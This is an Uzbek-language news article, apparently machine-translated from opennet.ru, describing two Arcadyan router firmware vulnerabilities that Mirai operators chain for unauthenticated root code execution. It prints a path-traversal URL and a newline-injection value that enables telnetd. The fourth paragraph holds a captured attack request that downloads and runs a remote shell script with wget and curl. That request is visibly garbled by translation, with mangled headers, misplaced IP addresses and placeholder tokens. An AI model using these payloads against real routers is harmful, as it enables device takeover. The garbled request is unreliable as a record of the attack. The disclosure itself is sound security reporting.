17 ta ishlab chiqaruvchiga ta'sir qiluvchi uy routerlarida zaiflik

Mikrodasturi Arcadyan kompaniyasining HTTP server ilovasidan foydalanadigan uy routerlariga qarshi tarmoqda katta hujum qayd etildi. Qurilmalar ustidan nazoratni qo'lga kiritish uchun ildiz huquqlariga ega bo'lgan o'zboshimchalik kodini masofadan bajarish imkonini beruvchi ikkita zaiflikning kombinatsiyasi qo'llaniladi. Muammo Arcadyan, ASUS va Buffalo ADSL routerlarining juda keng assortimentiga, shuningdek, Beeline brendlari ostida yetkazib beriladigan qurilmalarga (muammo Smart Box Flash-da tasdiqlangan), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone va boshqa aloqa operatorlari. Qayd etilishicha, muammo β€œArcadyan” proshivkalarida 10 yildan ortiq vaqt davomida mavjud boβ€˜lib, shu vaqt ichida 20 ta turli ishlab chiqaruvchilarning kamida 17 ta qurilma modeliga oβ€˜tishga muvaffaq boβ€˜lgan.

Birinchi zaiflik, CVE-2021-20090, autentifikatsiyasiz istalgan veb-interfeys skriptiga kirish imkonini beradi. Zaiflikning mohiyati shundaki, veb-interfeysda tasvirlar, CSS fayllari va JavaScript skriptlari yuboriladigan ba'zi kataloglarga autentifikatsiya qilinmasdan kirish mumkin. Bunday holda, autentifikatsiyasiz kirishga ruxsat berilgan kataloglar dastlabki niqob yordamida tekshiriladi. Asosiy katalogga o'tish yo'llarida "../" belgilarni ko'rsatish proshivka tomonidan bloklanadi, lekin "..% 2f" kombinatsiyasidan foydalanish o'tkazib yuboriladi. Shunday qilib, "http://192.168.1.1/images/..%2findex.htm" kabi so'rovlarni yuborishda himoyalangan sahifalarni ochish mumkin.

Ikkinchi zaiflik CVE-2021-20091 autentifikatsiya qilingan foydalanuvchiga application_abstract.cgi skriptiga maxsus formatlangan parametrlarni yuborish orqali qurilmaning tizim sozlamalariga oβ€˜zgartirishlar kiritish imkonini beradi, bu esa parametrlarda yangi qator belgisi mavjudligini tekshirmaydi. . Masalan, ping operatsiyasini amalga oshirayotganda, tajovuzkor /tmp/etc/config/ sozlamalari faylini yaratishda IP manzili tekshirilayotgan maydonda β€œ192.168.1.2%0AARC_SYS_TelnetdEnable=1” qiymatini va skriptni belgilashi mumkin. .glbcfg, uning ichiga β€œAARC_SYS_TelnetdEnable=1” qatorini yozadi, bu telnetd serverini faollashtiradi, bu esa ildiz huquqlari bilan cheklanmagan buyruq qobig'iga kirishni ta'minlaydi. Xuddi shunday, AARC_SYS parametrini o'rnatish orqali siz tizimdagi istalgan kodni bajarishingiz mumkin. Birinchi zaiflik muammoli skriptni β€œ/images/..%2fapply_abstract.cgi” sifatida kirish orqali autentifikatsiyasiz ishga tushirish imkonini beradi.

Zaifliklardan foydalanish uchun tajovuzkor veb-interfeys ishlayotgan tarmoq portiga so'rov yuborish imkoniyatiga ega bo'lishi kerak. Hujumning tarqalish dinamikasiga ko'ra, ko'plab operatorlar qo'llab-quvvatlash xizmati tomonidan muammolarni tashxislashni soddalashtirish uchun tashqi tarmoqdan o'z qurilmalariga kirishni qoldiradilar. Agar interfeysga kirish faqat ichki tarmoq bilan cheklangan bo'lsa, "DNS rebinding" texnikasi yordamida tashqi tarmoqdan hujum amalga oshirilishi mumkin. Zaifliklar allaqachon marshrutizatorlarni Mirai botnetiga ulash uchun faol foydalanilmoqda: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Ulanish: Foydalanuvchi-Agentni yopish: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_212.192.241.7_0 1%0A ARC_SYS_TelnetdEnable=212.192.241.72& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; curl+-O+http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX

Manba: opennet.ru

a Izoh qo'shish